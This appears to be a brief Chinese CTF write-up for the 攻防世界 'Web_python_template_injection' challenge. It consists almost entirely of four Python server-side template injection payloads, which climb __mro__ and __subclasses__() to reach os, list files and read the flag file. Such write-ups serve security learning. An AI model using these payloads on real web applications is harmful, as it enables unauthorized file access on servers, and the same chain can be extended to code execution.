攻防世界-web-高手进阶区011-Web_python_template_injection
1.判断存在python模块注入
{{7+7}}
2.{{''.__class__.__mro__[2].__subclasses__()}}
3.{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
4.{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
作者:joker0xxx3
本文版权归作者和博客园共有,任何人或团体、机构全部转载或者部分转载、摘录,请在文章明显位置注明作者和原文链接。 否则保留追究法律责任的权利。
